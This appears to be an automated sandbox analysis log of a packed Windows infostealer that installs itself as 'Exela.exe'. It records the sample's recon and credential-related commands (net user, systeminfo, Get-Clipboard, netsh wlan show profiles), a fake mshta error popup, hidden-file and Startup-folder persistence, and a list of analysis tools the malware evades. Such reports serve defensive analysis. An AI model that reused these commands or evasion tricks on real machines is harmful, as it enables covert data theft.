Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\HOSTNAME.EXE hostname
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\query.exe query user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net localgroup
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net localgroup administrators
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net user guest
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\System32\query.exe	Process created: C:\Windows\System32\quser.exe C:\Windows\system32\quser.exe
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\System32\net.exe	Process created: unknown unknown

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: 9afaXJv52z.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 9afaXJv52z.exe

Static file information: File size 16417517 > 1048576

Source: 9afaXJv52z.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9afaXJv52z.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9afaXJv52z.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9afaXJv52z.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9afaXJv52z.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9afaXJv52z.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 9afaXJv52z.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 9afaXJv52z.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1564172723.0000020DAB880000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 9afaXJv52z.exe, 00000000.00000003.1243849896.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp

Source: 9afaXJv52z.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9afaXJv52z.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9afaXJv52z.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 9afaXJv52z.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9afaXJv52z.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: VCRUNTIME140.dll.0.dr

Static PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]

Source: 9afaXJv52z.exe	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2
Source: _rust.pyd.0.dr	Static PE information: section name: UPX2
Source: Exela.exe.2.dr	Static PE information: section name: _RDATA
Source: Exela.exe0.2.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Code function: 0_2_00007FF6850F5004 push rsp; retf

0_2_00007FF6850F5005

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_cffi_backend.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\python3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_http_parser.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_websocket.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\multidict\_multidict.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_http_writer.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_helpers.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\yarl\_quoting_c.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\frozenlist\_frozenlist.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI67202\pyexpat.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\9afaXJv52z.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe

Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\Desktop\9afaXJv52z.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe

Jump to dropped file

Source: C:\Users\user\Desktop\9afaXJv52z.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe

Jump to behavior

Source: C:\Users\user\Desktop\9afaXJv52z.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe

Jump to behavior

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Code function: 0_2_00007FF6850B6EF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF6850B6EF0

Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELF.BANNED_PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1541670912.0000020DAFEB0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "XENSERVICE.EXE", # XEN
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1541670912.0000020DAFEB0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HANDLE = CTYPES.WINDLL.LOADLIBRARY("SBIEDLL.DLL")

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 2212

Source: C:\Users\user\Desktop\9afaXJv52z.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\python3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\pyexpat.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

